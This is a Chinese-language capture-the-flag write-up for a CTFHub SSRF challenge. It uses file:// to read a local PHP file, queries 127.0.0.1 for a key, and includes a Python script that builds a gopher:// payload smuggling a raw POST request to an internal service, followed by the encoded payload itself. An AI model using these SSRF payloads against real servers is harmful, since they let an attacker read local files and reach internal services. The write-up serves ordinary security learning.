CTFHUB-SSRF-POST请求

通过file协议访问flag.php文件内容

?url=file:///var/www/html/flag.php

右键查看页面源代码

需要从内部携带key发送post数据包即可获得flag

?url=http://127.0.0.1/flag.php

得到了key

构造POST请求数据包,进行url编码(新建一个txt文件,输入以下内容保存,修改为python文件,重命名为gopher.py

python 复制代码
# -*- coding: utf-8 -*
import urllib.parse
payload =\
"""
POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=d554812847363980d21b2b1b87733501
"""
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)

在命令行窗口执行

python gopher.py

通过Gopher协议发送请求,得到了flag

?url=gopher%3A//127.0.0.1%3A80/_%250D%250APOST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253Dd554812847363980d21b2b1b87733501%250D%250A
相关推荐
Clockwiseee6 小时前
php伪协议
windows·安全·web安全·网络安全
星河梦瑾9 小时前
SpringBoot相关漏洞学习资料
java·经验分享·spring boot·安全
Lspecialnx_11 小时前
文件解析漏洞中间件(iis和Apache)
网络安全·中间件
长潇若雪11 小时前
《类和对象:基础原理全解析(上篇)》
开发语言·c++·经验分享·类和对象
学习溢出12 小时前
【网络安全】逆向工程 练习示例
网络·安全·网络安全·渗透测试·逆向工程
志-AOX13 小时前
C语言入门指南:从零开始的编程之路
经验分享
WANGWUSAN6613 小时前
Python高频写法总结!
java·linux·开发语言·数据库·经验分享·python·编程
赵谨言15 小时前
基于python+django的外卖点餐系统
经验分享·python·毕业设计
孤独的履行者15 小时前
入门靶机:DC-1的渗透测试
数据库·python·网络安全